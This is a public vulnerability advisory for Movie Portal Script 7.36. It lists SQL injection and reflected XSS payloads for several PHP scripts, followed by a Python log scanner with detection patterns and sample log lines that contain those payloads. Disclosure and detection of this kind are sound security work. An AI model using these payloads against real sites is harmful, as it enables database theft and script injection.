CVE-2017-20139: Offensive Security’s Exploit Database Archive
A vulnerability classified as critical was found in Itech Movie Portal Script 7.36. It affects an unknown functionality of the file /show_news.php. Manipulating the argument id with the input AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) leads to error-based SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
Movie Portal Script 7.36 - Multiple Vulnerabilities
Platform: PHP
Date: 2017-01-25
Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability
Google Dork : -
Date : 20/01/2017
Exploit Author : Marc Castejon <[email protected]>
Vendor Homepage : http://itechscripts.com/movie-portal-script/
Software Link: http://movie-portal.itechscripts.com
Type : webapps
Platform: PHP
Software Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/show_news.php
Vulnerable Parameters: id
Method: GET
Payload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL: http://localhost/[PATH]/movie.php
Vulnerable Parameters : f=
Payload: <img src=i onerror=prompt(1)>
---------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/show_misc_video.php
Vulnerable Parameters: id
Method: GET
Payload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-----------------------------------------------
Type: Union Query Sql Injection
Vulnerable URL: http://localhost/[PATH]/movie.php
Vulnerable Parameters: f
Method: GET
Payload: -4594 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
-----------------------------------------------
Type: Union Query Sql Injection
Vulnerable URL: http://localhost/[PATH]/artist-display.php
Vulnerable Parameters: act
Method: GET
Payload: UNION ALL SELECT
NULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
-----------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL: http://localhost/[PATH]/film-rating.php
Vulnerable Parameters: v
Method: GET
Payload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
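
A defender-side check for the requests listed in this advisory, as an added example that is not part of the original advisory or the vendor's code: it scans web access-log lines for the affected scripts and parameters and flags values matching the payload shapes shown above. The signature labels, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters listed as vulnerable in the advisory above.
WATCHED = {
    "show_news.php": {"id"}, "show_misc_video.php": {"id"},
    "film-rating.php": {"v"}, "movie.php": {"f"},
    "artist-display.php": {"act"},
}
# Signatures for the payload shapes in the advisory (labels are this example's own).
SIGNATURES = [
    ("sqli-error", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    ("sqli-union", re.compile(r"union\s+(?:all\s+)?select\b", re.I)),
    ("sqli-schema", re.compile(r"information_schema\.", re.I)),
    ("xss-handler", re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return sorted (script, param, signature) hits for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]   # ignore the install prefix ([PATH])
    hits = set()
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in WATCHED.get(script, ()):
            continue
        for label, rx in SIGNATURES:
            if rx.search(value):
                hits.add((script, name, label))
    return sorted(hits)

def scan_log(lines):
    """Map 1-based line number -> hits, for lines with at least one hit."""
    return {n: h for n, line in enumerate(lines, 1) if (h := scan_line(line))}

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jan/2017:10:00:01 +0000] "GET /show_news.php?id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Jan/2017:10:00:05 +0000] "GET /show_news.php?id=3%20AND%20(SELECT%201222%20FROM(SELECT%20COUNT(*),CONCAT(0x71786b7a71,(SELECT%20(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 200 812',
    '203.0.113.9 - - [25/Jan/2017:10:00:09 +0000] "GET /movie.php?f=%3Cimg%20src%3Di%20onerror%3Dprompt(1)%3E HTTP/1.1" 200 4410',
    '203.0.113.9 - - [25/Jan/2017:10:00:12 +0000] "GET /portal/artist-display.php?act=1%20UNION%20ALL%20SELECT%20NULL,NULL%23 HTTP/1.1" 200 3301',
    '203.0.113.7 - - [25/Jan/2017:10:00:20 +0000] "GET /movie.php?f=12 HTTP/1.1" 200 6004',
]
```

Pattern matching like this is a triage aid for finding past probing in logs; the fix for the affected scripts remains parameterized queries for the SQL injection and output encoding for the reflected XSS.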